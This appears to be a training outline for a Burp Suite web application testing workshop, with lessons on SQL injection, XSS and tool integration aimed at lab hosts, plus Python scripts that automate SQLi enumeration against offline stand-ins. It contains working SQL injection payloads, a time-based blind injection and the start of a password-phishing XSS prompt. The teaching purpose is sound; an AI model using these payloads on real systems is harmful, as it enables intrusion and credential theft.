Burp Suite Workshop


Web App Security Testing & Burp Suite Fundamentals 

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with Skipfish
Integrating Burp with SQLMap

Day 2: Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation

Course By: Joseph McCray

Lessons

C1L1: Course Materials

Author: Joseph McCray

Slides:
https://s3.amazonaws.com/infosecaddictsfiles/WebAppSecIsNotEasyButCanBeSimple.pptx
https://s3.amazonaws.com/infosecaddictsfiles/Burp+Suite.pptx

Lab Manual: https://s3.amazonaws.com/infosecaddictsfiles/BurpSuite-Bootcamp-v1.pdf

Day 1 Homework: Here is a good reference on how to use Burp to look for OWASP Top 10 vulnerabilities: https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten

Use Burp Suite to demonstrate, with screenshots and explanations, how to test for all of the OWASP Top 10 vulnerabilities against your choice of targets the [...]

C1L2: Getting started with VMWare

Author: Joseph McCray

For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

A 30-day trial of Workstation 11 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0

A 30-day trial of Fusion 7 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0

The newest version of VMWare Player can be downloaded from here: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0 [...]

C1L3: Basic: Web Application Testing

Author: Joseph McCray

WEB APPLICATION TESTING

Most people are going to tell you to reference the OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. The key to doing a [...]

C1L4: SQL Injection

Author: Joseph McCray

https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx

Another quick way to test for SQLi is to remove the parameter value entirely and see whether the page errors.

Error-Based SQL Injection

http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--

NOTE: "N" [...]
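The payloads above work because SQL Server has to convert the text returned by DB_NAME(N) to an integer to compare it with 1, and the conversion error it raises quotes the value it choked on. Below is an added example (not part of the course material) that automates that loop: it builds the same `or 1 in (SELECT DB_NAME(N))--` payload for each N, scrapes the database name out of the error text, and keeps walking past unused IDs, since DB_NAME() returns NULL for a dropped database and NULL compared with 1 raises no error at all. The lab host URL is the one in the lesson; `fake_send` and the `FAKE_DB_IDS` table are a constructed stand-in for the vulnerable page so the script runs offline (IDs 1 to 4 are always master, tempdb, model and msdb on SQL Server; the other entries are invented).

```python
import re
from urllib.parse import quote, unquote

# Course target (from the lesson). The request function used below is a constructed
# stand-in for the lab server, not a live request.
TARGET = "http://54.213.252.28/bookdetail.aspx"

# SQL Server's conversion error quotes the value it could not turn into an int; that
# quoted value is the database name leaked by '1 in (SELECT DB_NAME(N))'.
LEAK_RE = re.compile(r"converting the nvarchar value '([^']*)' to data type int")


def db_name_url(n: int) -> str:
    """Build the error-based payload for database ID n, URL-encoded as Burp would send it."""
    payload = f"2 or 1 in (SELECT DB_NAME({n}))--"
    return f"{TARGET}?id={quote(payload)}"


def leaked_value(body: str):
    """Return the value quoted in the conversion error, or None if the page rendered normally."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def enumerate_databases(send, max_id: int = 64, max_gap: int = 3) -> dict:
    """Walk DB_NAME(0..max_id) and collect every name the error leaks.

    A miss does not mean the end of the list: DB_NAME() returns NULL for an unused ID
    (a dropped database leaves a gap) and '1 in (NULL)' raises no error, so keep
    going until max_gap consecutive IDs come back clean.
    """
    found = {}
    gap = 0
    for n in range(max_id + 1):
        name = leaked_value(send(db_name_url(n)))
        if name is None:
            gap += 1
            if gap >= max_gap:
                break
            continue
        gap = 0
        found[n] = name
    return found


# Constructed stand-in for the vulnerable page. IDs 1-4 are the SQL Server system
# databases; ID 0 and ID 6 are invented for the demo, and ID 5 is a deliberate gap.
FAKE_DB_IDS = {0: "bookshop", 1: "master", 2: "tempdb", 3: "model", 4: "msdb", 6: "reports"}


def fake_send(url: str) -> str:
    """Answer the way the lab page would: an error page when DB_NAME(n) is non-NULL."""
    n = int(re.search(r"DB_NAME\((\d+)\)", unquote(url)).group(1))
    if n in FAKE_DB_IDS:
        return ("<h1>Server Error</h1><p>Conversion failed when converting the nvarchar "
                f"value '{FAKE_DB_IDS[n]}' to data type int.</p>")
    return "<h1>Book detail</h1><p>Some book</p>"


if __name__ == "__main__":
    for db_id, name in enumerate_databases(fake_send).items():
        print(f"DB_NAME({db_id}) = {name}")
```

Against the real lab, `send` would be a function that fetches the URL through the Burp listener and returns the response body; the `max_gap` stop rule is the part people get wrong when they do this by hand, because the first blank response is usually taken as the end of the list.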

C1L5: Union-Based SQL Injection

Author: Joseph McCray

http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
http://54.213.252.28/bookdetail.aspx?id=2 order by 9--

http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

We are using a union select statement because we are joining the developer's query [...]
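The `order by` sequence above is a manual search for the largest column position that does not error; the first failing position minus one is the number of columns in the developer's query, which is what the union needs to match. Added example (not the course's code): the same search done programmatically, doubling until `order by N` fails and then binary-searching, and the union probe built from the result. The target URL is the lesson's; `fake_send` is a constructed stand-in that errors above 9 columns so the script runs offline, using SQL Server's real "ORDER BY position number ... is out of range" message as the failure signal.

```python
import re

TARGET = "http://54.213.252.28/bookdetail.aspx?id=2"  # from the lesson

# SQL Server's complaint when ORDER BY names a column position that does not exist.
ORDER_BY_ERR = re.compile(r"ORDER BY position number (\d+) is out of range")


def order_by_url(n: int) -> str:
    return f"{TARGET} order by {n}--"


def union_url(columns: int) -> str:
    """The probe union: each number shows up wherever that column is rendered in the page."""
    return f"{TARGET} union all select {','.join(str(i) for i in range(1, columns + 1))}--"


def find_column_count(send, max_columns: int = 256):
    """Largest n for which 'order by n' still succeeds, i.e. the number of columns the
    developer's query selects. Doubles up to the first failure, then binary-searches
    between the last success and that failure, instead of stepping through
    100/50/25/10/5/6/7/8/9 by hand.
    """
    def ok(n):
        return ORDER_BY_ERR.search(send(order_by_url(n))) is None

    if not ok(1):
        return None  # the injection itself is not landing; nothing to order by
    lo, hi = 1, 2
    while hi <= max_columns and ok(hi):
        lo, hi = hi, hi * 2
    if hi > max_columns:
        return None
    # invariant from here: ok(lo) is True and ok(hi) is False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ok(mid):
            lo = mid
        else:
            hi = mid
    return lo


# Constructed stand-in for the lab page: the developer's query selects 9 columns,
# matching the lesson, where 'order by 9' is the last one that succeeds.
FAKE_COLUMNS = 9


def fake_send(url: str) -> str:
    m = re.search(r"order by (\d+)", url)
    if m and int(m.group(1)) > FAKE_COLUMNS:
        return (f"The ORDER BY position number {m.group(1)} is out of range of the number "
                "of items in the select list.")
    return "<h1>Book detail</h1>"


if __name__ == "__main__":
    n = find_column_count(fake_send)
    print(f"{n} columns -> {union_url(n)}")
```

The count only tells you how many columns to supply; the union still has to be type-compatible with the original select, so if the probe errors on a conversion, replace the offending number with NULL until the row comes back and then substitute your own expressions column by column.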

C1L6: Blind SQL Injection Testing

Author: Joseph McCray

BLIND SQL INJECTION TESTING

Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
(Ok, the username is 3 chars long - it waited 10 seconds)

Let's go for a quick check to see if [...]

C2L1: What is XSS

Author: Joseph McCray

WHAT IS XSS

https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx

OK - what is Cross Site Scripting (XSS)?

1. Use Firefox to browse to the following location: http://45.63.104.73/xss_practice/
A really simple search page that is vulnerable should come up.

2. In the search box type:
<script>alert('So this is XSS')</script>
This should pop up an alert window with your message in it [...]
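The alert fires because the search page copies whatever you typed straight back into the HTML, so the browser parses your `<script>` tag as part of the page. Added example (not the lab's code, which is not written in Python): a minimal handler with that bug next to the one-line fix, plus the check you actually make in Burp Repeater after sending the probe, namely whether the probe came back byte-for-byte or HTML-encoded. The search page layout is invented; the probe string is the lesson's.

```python
import html

PROBE = "<script>alert('So this is XSS')</script>"  # the lesson's payload


def render_search_vulnerable(query: str) -> str:
    """Echoes the search term straight into HTML: the browser parses the <script> tag."""
    return f"<html><body><h1>Search</h1><p>You searched for: {query}</p></body></html>"


def render_search_fixed(query: str) -> str:
    """Same page, input encoded for an HTML text context. quote=True also encodes
    quotes, which matters if the same value is later dropped inside an attribute."""
    safe = html.escape(query, quote=True)
    return f"<html><body><h1>Search</h1><p>You searched for: {safe}</p></body></html>"


def reflected_unescaped(body: str, probe: str) -> bool:
    """The Repeater check: is the probe back in the response exactly as sent?
    An encoded echo (&lt;script&gt;) is not exploitable in a text context."""
    return probe in body


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable), ("fixed", render_search_fixed)):
        page = render(PROBE)
        print(f"{name}: reflected unescaped = {reflected_unescaped(page, PROBE)}")
```

Encoding is context-specific: `html.escape` is the right fix for text and attribute values, but a value reflected inside a `<script>` block or a URL needs JavaScript-string or URL encoding instead, which is why the Repeater check looks at where the probe landed, not just whether it was encoded.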

C2L2: A Better Way To Demo XSS

Author: Joseph McCray

XSS DEMO

Let's take this to the next level. We can modify this attack to include some username/password collection.

Use Firefox to browse to the following location: http://40.86.183.118/xss_practice/

Paste all of this into the search box.

Option 1
<script> password=prompt('Your session is expired. Please enter your password to [...]

C3L1: Setting up Burp Suite

Author: Joseph McCray

Download the latest free version of Burp at http://www.portswigger.net/burp/download.html

Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar; the execute bit is not actually needed for java -jar, but it does no harm) and then run:
java -jar burpsuite_free_v1.6.31.jar

Click the "Proxy" tab
Click the "Options" sub-tab
Click "Edit" in the "Proxy Listeners" section
In the "Edit proxy listener" pop-up select the "Binding" tab and select "loopback only". In [...]

C3L2: Web Services

Author: Joseph McCray

WEB SERVICES

http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl

Question 1: What is the process that you use when you test?

Step 1: Automated Testing
Step 1a: Web Application vulnerability scanners
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated [...]

C3L3: How much fuzzing is enough?

Author: Joseph McCray

There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. Step 1: Ask yourself the 3 questions per page of [...]

C4L1: Nikto with Burp in Linux

Author: Joseph McCray

NIKTO WITH BURP

cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h http://zero.webappsecurity.com -useproxy http://localhost:8080/

Burp's proxy listener must be up on 127.0.0.1:8080 (the default) before -useproxy will route the scan through it; every Nikto request then shows up in Proxy history and can be rewritten with a Match and Replace rule.

Masking the Nikto header reference: http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html